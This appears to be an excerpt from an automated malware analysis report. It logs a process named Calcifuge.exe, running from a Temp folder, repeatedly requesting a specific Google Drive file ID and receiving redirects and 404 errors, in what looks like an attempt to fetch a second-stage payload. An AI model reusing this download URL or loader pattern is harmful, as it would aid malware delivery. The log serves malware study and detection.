                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-P4t3a8xaFzGQLJilrBJF2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              63192.168.2.453784172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:42 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:42 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTEkSdB5hS4vuXRSGDRJp6RYrJleGbFrd5lK99c7WGfKZTbdFgO68-6_CfJB2kJDCJt-ArzxFA
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:42 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-pwvqD6LTrtBEmzgHA5vyHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 38 43 51 35 30 37 37 63 58 65 6a 4b 30 6c 57 70 6e 56 34 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_8CQ5077cXejK0lWpnV4mg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              64192.168.2.453785172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:43 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:43 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:43 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-CTyQMYcsbth0wXrpHrv8xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              65192.168.2.453786172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:44 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:44 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC52WCurO64HWgCmKwyuTh-Z-o9GNpP7qlMDc0l9XI52ty04waw7yMExhVGTuCwClHAV
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:44 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-nSZ_3Pr0GrSS6exQnu7_RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 43 55 55 63 69 4f 33 30 41 61 7a 6e 37 70 62 39 4a 52 41 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8CUUciO30Aazn7pb9JRAsg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              66192.168.2.453787172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:45 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:46 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-N5oSTWk7a7rPGbyqjNm8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              67192.168.2.453788172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:46 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:47 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTw8pVFJ_8gROVWcfMpRK9XMxYI1LnJgW4ao20t_wr7dGvE1bfAqkOQZvJa6BXOYrja
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:47 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-uSayR9OTTZLc2K0fZyucTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 31 49 52 44 6e 5a 52 50 6f 69 64 47 5a 6f 31 31 5a 48 76 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="71IRDnZRPoidGZo11ZHv5w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              68192.168.2.453789172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:48 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:48 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-vRWc6zWOdBQT-mVXrLiKRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              69192.168.2.453790172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:49 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:49 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgT-s8RMq3mIctGA5_O297JTFPDTUVkRH8CipXL9ci6-o5iiV_2WfornzL9WHl1GcH4M8bqaVPI
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:49 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-A-lH-WkmLEHKA6lAxZAVEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
